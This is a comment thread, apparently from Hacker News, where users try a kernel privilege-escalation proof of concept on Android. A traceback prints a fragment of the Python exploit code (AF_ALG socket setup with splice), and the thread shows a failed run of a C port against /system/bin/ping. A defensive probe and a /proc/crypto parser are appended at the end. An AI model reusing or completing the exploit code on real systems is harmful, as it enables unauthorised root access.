Comment by int0x29

19 hours ago

Now the socket is blocked. Also probably should have realized the socket is defined earlier than it's called.

    Traceback (most recent call last):
      File "/data/data/com.termux/files/home/exploit.py", line 9, in <module>
        while i<len(e):c(f,i,e[i:i+4]);i+=4
                       ^^^^^^^^^^^^^^^
      File "/data/data/com.termux/files/home/exploit.py", line 5, in c
        a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
        ^^^^^^^^^^^^^^^^
      File "/data/data/com.termux/files/usr/lib/python3.12/socket.py", line 233, in __init__
        _socket.socket.__init__(self, family, type, proto, fileno)
    PermissionError: [Errno 13] Permission denied

PoC is also x86_64 only and not arm.

  • fixed: https://github.com/tgies/copy-fail-c

    • Thanks! Will give it a try a bit later.

      (HN algorithms have killed some of your comments, perhaps because you posted the same URL too many times from a relatively new account? I’ve vouched for you, but keep in mind that it triggers antispam.)

      ---

      Edit: naturally, no luck:

        $ ./exploit /system/bin/ping
        [+] target:    /system/bin/ping
        [+] payload:   2112 bytes (528 iterations)
        socket(AF_ALG): Permission denied
        patch_chunk failed at offset 0
      

      Guess AF_ALG is just disabled on Android kernel builds. Though maybe it’ll work on other devices!
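Added example (not from the thread or the linked PoC repository): a defender-side probe that tells apart a kernel built without AF_ALG from one where the interface exists but policy (SELinux, seccomp, etc.) denies it, which is what the `Permission denied` above suggests, plus a small parser for the `/proc/crypto` format so an admin can list which algorithm types the kernel exposes at all. The `/proc/crypto` sample is constructed, and the errno set treated as "unsupported" is an assumption.

```python
import errno
import socket

# Constructed sample in the format of /proc/crypto (not captured from a real device).
SAMPLE_PROC_CRYPTO = """\
name         : sha256
driver       : sha256-generic
type         : shash
digestsize   : 32

name         : cbc(aes)
driver       : cbc(aes-generic)
type         : skcipher
"""


def parse_proc_crypto(text):
    """Map each algorithm name in /proc/crypto output to its 'type' field."""
    algos, current = {}, None
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        if key == "name":
            current = value
        elif key == "type" and current is not None:
            algos[current] = value
    return algos


def probe_af_alg():
    """Classify AF_ALG exposure for the calling process: 'unsupported' (no
    AF_ALG at all), 'denied' (EACCES/EPERM, e.g. SELinux), or 'available'."""
    family = getattr(socket, "AF_ALG", None)
    if family is None:          # non-Linux or old Python: no AF_ALG constant
        return "unsupported"
    try:
        sock = socket.socket(family, socket.SOCK_SEQPACKET, 0)
    except PermissionError:     # EACCES / EPERM: interface present, access denied
        return "denied"
    except OSError as exc:
        # Assumed set of errnos meaning the kernel has no AF_ALG support built in.
        if exc.errno in (errno.EAFNOSUPPORT, errno.EPROTONOSUPPORT, errno.EINVAL):
            return "unsupported"
        raise
    sock.close()
    return "available"
```

Run `probe_af_alg()` on the device under review; if it reports `available`, `parse_proc_crypto(open("/proc/crypto").read())` lists which algorithm types (aead, skcipher, shash, ...) unprivileged processes can reach through that socket family.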